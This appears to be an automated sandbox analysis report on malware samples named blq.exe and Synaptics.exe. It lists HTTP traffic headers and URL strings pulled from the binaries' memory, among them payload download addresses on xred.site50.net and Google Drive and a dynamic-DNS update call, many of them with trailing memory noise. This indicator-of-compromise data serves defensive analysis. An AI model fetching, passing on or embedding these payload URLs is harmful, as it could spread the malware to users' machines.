                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6UQSDGhHohRCXytTvF-Mj5uRR5EYLwwxcln5ZdePBCftb7WvbCfNx7Ti_bWAXk2LOkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 21:12:01 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-cn6I2J5nrc4Qkb5ID8ODUA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6_w0ykohPpKsjtoZ56KJDzBPFu0JoPK49HR0KKLo5Yz3FkrtdAv1ueB4zm0bUvLChpContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 21:12:07 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-9l9ddGzrBuXwAHyAuWgxGA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC43HM8bEOZiQUveYCWjJjbGzcd8pvjx8i4L2guVwCiMSAGrzavNYdou07rw7dKdfIVj7vW3PsIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 21:12:07 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-nvGiOzTDuc_5ecr-vOND6w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7v5oCN09FNRVxhjUA_E3jyzlK8yNjGyzckvBgYexjigbDxpvA1vfBAyT27UgQtZ_w7Hp03Pp8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 21:12:15 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-kzxPUoPJWQ3bRNi8l_H09Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC66x_MxidOmmNANaz9iYvtr0igAuuex2lwF4JMkbTu94-5hRid4vrbCl1wRLk4KmvRnContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 21:12:16 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-z-hLb-I4gArl8Y4iv00V_g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: blq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, Synaptics.exe, 00000003.00000002.2938078109.000000000081B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938602891.0000000002080000.00000004.00001000.00020000.00000000.sdmp, RCXAFD2.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.drString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                          Source: Synaptics.exe, 00000003.00000002.2938078109.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978R
                          Source: Synaptics.exe, 00000003.00000002.2938078109.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978~
                          Source: blq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, Synaptics.exe, 00000003.00000002.2938602891.0000000002080000.00000004.00001000.00020000.00000000.sdmp, RCXAFD2.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.drString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                          Source: blq.exe, 00000000.00000003.1661544284.0000000002290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dlp
                          Source: blq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, Synaptics.exe, 00000003.00000002.2938602891.0000000002080000.00000004.00001000.00020000.00000000.sdmp, RCXAFD2.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.drString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                          Source: blq.exe, 00000000.00000003.1661544284.0000000002290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniH))
                          Source: blq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, Synaptics.exe, 00000003.00000002.2938602891.0000000002080000.00000004.00001000.00020000.00000000.sdmp, RCXAFD2.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.drString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE22000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.000000000082B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/:
                          Source: Synaptics.exe, 00000003.00000002.2946052719.0000000007707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/d
                          Source: Synaptics.exe, 00000003.00000002.2946052719.0000000007707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/l
                          Source: Synaptics.exe, 00000003.00000002.2973653259.000000001553E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2964528186.000000001047E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2956086425.000000000D87E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2976837212.00000000180FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3028509920.000000002B33E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0;
                          Source: blq.exe, 00000000.00000003.1661544284.0000000002290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                          Source: blq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, Synaptics.exe, 00000003.00000002.2938602891.0000000002080000.00000004.00001000.00020000.00000000.sdmp, RCXAFD2.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                          Source: blq.exe, 00000000.00000003.1661544284.0000000002290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
                          Source: Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2956858218.000000000E27E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3000353585.000000001DF15000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.000000000082B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2994011286.000000001DA97000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2964889949.00000000106FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962865371.000000000F07E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938602891.0000000002080000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2969650789.00000000134BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E73E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2970000995.000000001373E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2961258759.000000000E932000.00000004.00000020.00020000.00000000.sdmp, blq.exe, RCXAFD2.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2997458148.000000001DD14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3000353585.000000001DF15000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
                          Source: Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E73E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
                          Source: Synaptics.exe, 00000003.00000002.2938078109.000000000085C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%xu
                          Source: Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&5
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2997458148.000000001DD14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3000353585.000000001DF15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.0000000007707000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.0000000007707000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-List
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-Mr
                          Source: Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-b
                          Source: Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-spa
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-uri4
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
                          Source: Synaptics.exe, 00000003.00000002.2957759712.000000000E6C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.-.
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download..
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download...
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download..Ss
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.B
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.NU
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.com
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.com.
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.com.V
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.com.y
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2994011286.000000001DA97000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                          Source: Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download//T
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/Driv.
                          Source: Synaptics.exe, 00000003.00000002.2957759712.000000000E6C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/c
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2957759712.000000000E6C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2997458148.000000001DD14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3000353585.000000001DF15000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.000000000082B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
                          Source: Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0)
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.0000000007707000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.000000000085C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1OF
                          Source: Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1b
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                          Source: Synaptics.exe, 00000003.00000002.2957759712.000000000E6C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2-
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2B
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2Yb
